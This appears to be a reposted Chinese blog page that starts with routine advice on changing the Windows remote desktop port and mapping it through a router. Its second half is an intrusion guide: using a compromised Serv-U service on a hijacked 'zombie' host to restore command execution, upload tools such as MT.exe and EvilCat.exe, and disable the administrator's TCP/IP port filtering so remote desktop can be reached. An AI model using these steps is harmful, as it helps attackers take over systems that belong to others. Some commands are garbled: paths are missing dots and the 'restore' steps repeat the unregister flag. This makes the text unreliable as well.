远程终端服务基于端口3389。入侵者一般先扫描主机开放端口,一旦发现其开放了3389端口,就会进行下一步的入侵,所以我们只需要修改该务默认端口就可以避开大多数入侵者的耳目。 打开注册表,
1进入以下路径:
〔HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds\rdpwd\Tds\tcp〕,看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如6222。
2再打开〔HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP\Tcp〕,将PortNumber的值(默认是3389)修改成端口6222。
修改完毕,重新启动电脑,以后远程登录的时候使用端口6222就可以了。
这个地址是打不开的,因为你要连接的是局域网的服务器,进入服务器通过浏览器是不能进入的,具体进入服务器方法如下:
1、左面左下角----开始-----运行
2、输入mstsc后按确定
3、输入服务器的IP,连接后输入用户和密码。然后点确定,即可直接远程登录服务器。
外网如何访问内网服务器?具体 *** 作步骤:
1、路由器上需要设置端口映射,将你服务器上的3389端口映射到路由器上,这样,你就可以通过外网访问3389端口来对服务器进行远程桌面控制。
2、不过为了安全,你可以将路由器上的任意一个不常用端口号,比如8888等映射到服务器的3389端口,这样,外网扫描3389的软件就不会扫描到你的服务器。
3、不过,你的外网有固定IP吗(19216818只是内网IP,外网是看不到的)。如果没有的话,就需要每一次都要用外网IP访问服务器,或者如果路由器支持动态DNS的话,申请一个花生壳账号也可以。
4、开始---运行---mstsc---输入外网IP---用户名和密码---登陆成功。
×
命令行执行组件
这是因为wscriptshell改名了,或者从注册表删除了
删除方法:
regsvr32/u
C:\windows\System32\wshomocx
regsvr32/u
C:\windows\System32\shell32dll
恢复方法:
regsvr32/u
C:\windows\System32\wshomocx
regsvr32/u
C:\windows\System32\shell32dll
这里利用serv-u执行恢复命令
cmd
/c
regsvr32/u
C:\windows\System32\wshomocx
cmd
/c
regsvr32/u
C:\windows\System32\shell32dll
恢复wscriptshell之后,本来不能读取的3389端口,变为可以读取了
为什么有时候3389开放却不能连接,有时候是因为防火墙,把终端端口转发到其他端口就可以连接,
但是更多的转发后依然是连接不上,哪是因为管理员在TCP/IP里设置的端口限制。
就算再怎么转都是连不上的。
我们需要把端口转为TCP/IP里设置的只允许连接的端口其中一个就可以了,
更好的办法是取消端口限制。
我们上传一个MT到肉鸡上,然后用具备系统权限的sev-u来执行命令。
上传cmdexe,MTexe到C盘,
就在Serv-u执行:c:\cmdexe
/c
"mt
-filter
off"
而且运行成功,肉鸡也不会重启。
也可以传一个“解除TCPIP筛选的小工具EvilCatexe”(有个小小缺点,运行后主机会重启)
直接运行就可以了
传到c:\EvilCatexe
在Serv-u执行就OK了:c:\cmdexe
/c
"EvilCatexe"
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)